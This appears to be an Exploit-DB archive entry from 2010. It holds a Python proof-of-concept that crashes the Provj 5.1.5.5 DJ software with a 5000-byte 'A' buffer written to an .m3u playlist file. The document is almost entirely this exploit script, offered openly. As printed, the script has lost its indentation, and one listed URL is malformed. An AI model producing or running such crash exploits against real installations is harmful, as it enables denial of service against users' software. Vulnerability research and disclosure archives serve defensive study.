Provj 5.1.5.5 - '.m3u' Buffer Overflow (PoC)
Author: 0v3r
type: dos
platform: windows
port:
date_added: 2010-11-30
date_updated: 2010-12-01
verified: 1
codes: OSVDB-69519
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2010-12-01-at-82315-am.png
application_url: http://www.exploit-db.comprovj5.exe
# Exploit Title: Provj 5.1.5.5 (m3u) Buffer Overflow Vulnerability PoC
# Date: 11/30/2010
# Author: 0v3r
# Software Link: http://www.clubdjpro.com/files/provj5.exe
# Version: 5.1.5.5
# Tested on: Windows XP SP3 EN
# CVE: N/A
#!/usr/bin/python
buff = "\x41" * 5000
try:
f = open("exploit.m3u",'w')
f.write(buff)
f.close()
print "[-] File created!\n"
except:
print "[-] Error occured!\n"